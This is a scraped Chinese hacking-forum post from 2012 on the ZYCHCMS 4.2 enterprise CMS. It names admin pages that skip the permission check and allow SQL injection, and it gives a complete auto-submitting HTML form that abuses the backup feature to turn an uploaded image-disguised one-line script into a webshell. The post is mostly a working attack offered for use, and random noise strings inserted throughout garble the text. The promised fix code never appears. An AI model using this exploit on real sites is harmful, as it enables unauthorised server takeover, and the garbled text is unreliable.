找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1929|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

& e/ ?7 m. E: s' ?% T$ c& U/ z" l6 m% C) j  a' s
7 ?4 ^- n5 ?3 x9 l

! M2 J2 o5 [2 s; Y& o+ ^影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)' H0 C) Y8 y& Q% q' ]! v- ~% ~# w
①SQL注射漏洞, g" ]( P3 G9 l* z& J$ }$ {9 ]
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp, `  V& F3 i% P& D$ x2 E4 E( \  ^
漏洞原因:未过滤
- n; G- i4 Q* u4 J 漏洞代码:
7 {. \$ Z3 S: f$ J1 ^ 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。" l- R2 D+ x. Y7 o3 I) n: z& b
修复方法:在文件开头加入代码
) C' K. ^* u2 S3 |. [! R( i" R ' D7 J1 B1 e) b7 F: _$ l
: _1 V) Z9 v" m7 z) N
②后台拿WBSHELL. A- y) G7 \, \7 @
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。" Y% `6 C, R0 N0 K, \
这里在网上找了一个,改了下,将就着用。
1 z! O& n; V* H+ N: C+ U 以下是代码本地提交代码8 l: C8 H+ J/ T, |  t( p
' G& _3 ~0 |" A
. I* {% N9 H, b& `8 G" Y
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
5 @4 Q4 p' l$ E- |1 _; p <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>) k- V- Q/ j; k( k! t4 P' r/ q6 n' O
<tr>
+ m' X$ {( S* h( y6 l <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>6 W5 E5 Y% g8 X3 _$ Z2 m) _
</tr>5 C9 }; G$ I( k
<tr>
& y! I- k- W( e  ?) g. n) Q( { <td bgcolor=”#FFFFFF”><span class=”back_southidc”>; l: ?1 A) ^+ n' d% h1 k
</span>
3 \. v  H* l- [: x <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
$ a. W* T7 n# j/ Q4 q7 [5 S. t <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >- O( K4 Z; r  W6 j( C
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>' V( w! R! g/ g7 l$ c9 L. F
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
: }6 P+ @: f8 [/ m. x <div align=”left”>% g: d: E: s9 }- j5 [+ h( Q
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
% g2 H+ G( j! u5 {. u% Y4 f* O <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>$ ?  P6 i1 {9 ]1 Q; d  R
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
5 i0 Y& _* b+ f! I, o </div></td>( O3 [( h/ A* ^2 Y: E3 u
</tr>$ G5 G# P( t9 G/ Q8 p9 w
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>) r( V% Y. e! `/ r1 r7 e& d" d  Q8 {5 x% A
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
9 N* v6 S# m, h9 m* K <td class=”td”><div align=”left”>; e- v$ r# c' \
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />5 X% M9 f1 @& [7 v+ J
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
1 H$ Q* d4 W6 {% i3 l- p </tr>
+ d8 Q8 u; q/ f( e <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
9 f) P7 S/ j* b3 H" s! Q <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
/ I7 a, ]0 w6 T7 s3 ~ <td class=”td”><div align=”left”>
: E) C8 c8 P" H) x7 h, ~3 } <input type=”submit” value=”确定备份” class=”btn”$ Y2 I5 U  y) ?8 I5 y  Q" U$ a
</div></td>
; m' `2 c+ }3 g* A  G) J  B </tr>; Z* R' f- n: x& F
</table></td></tr></form>
" T; o( x8 x" N. {/ ? </table>" V7 Z- @: _3 E1 [
</td>
; p( B9 p0 O9 a5 D2 G9 O( T! p, ` </tr>
* e2 ~: }  Y- p$ R7 O: o7 B </table>
7 S' ~: i& c. d) W4 k6 H <script>9 {  G. ?% B* z& J3 E5 G; Z/ j/ m
document.all.add.submit();
; A4 S1 c: R: S </script>4 `8 o; s; ~. [

3 J6 p; R& P& o  C0 k5 c
5 x; t6 B* @5 |* D) l$ W  O- t- B; r  p% h$ J

! S2 [" b& A: i8 n8 C. g& m- H; \, D0 b$ O

# N) {, m! [5 @
/ w& J/ t7 t/ @* Q7 P" H0 f( y4 e8 z  c6 w4 |

- k+ E1 H) ]5 j# S4 O5 L
/ C4 d) Z! |: Q9 F7 ]  \& W! B
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表